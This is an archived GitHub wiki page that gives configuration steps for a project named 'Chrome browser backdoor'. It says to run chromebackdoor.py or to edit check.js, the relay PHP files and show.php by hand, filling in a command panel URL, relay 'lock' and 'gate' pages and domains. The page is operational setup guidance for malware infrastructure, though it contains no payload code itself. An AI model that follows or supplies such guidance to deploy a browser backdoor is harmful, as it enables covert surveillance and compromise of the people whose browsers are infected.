Skip to content
This repository was archived by the owner on Apr 21, 2023. It is now read-only.

Path configure

James Bond edited this page Aug 30, 2016 · 3 revisions

Chrome browser backdoor

installation script

You can configure the backdoor with python script

  1. python chromebackdoor.py

Manual configure

Edit all pages below

  • server/js/check.js
    var server_web = "add panel url"
    var lock_page = "add relais lock page"
    var gate_page = "add relais gate"
  • relais/index.php
$domain = "add domain exemple : http://localhost:8888/taff/private/newbackdoor/";
  • relais/show_script.php
$domain = "add domain exemple : http://localhost:8888/taff/private/newbackdoor/";
  • web/show.php
    var server_web = "add panel url"
    var gate_page = "add web gate"

Clone this wiki locally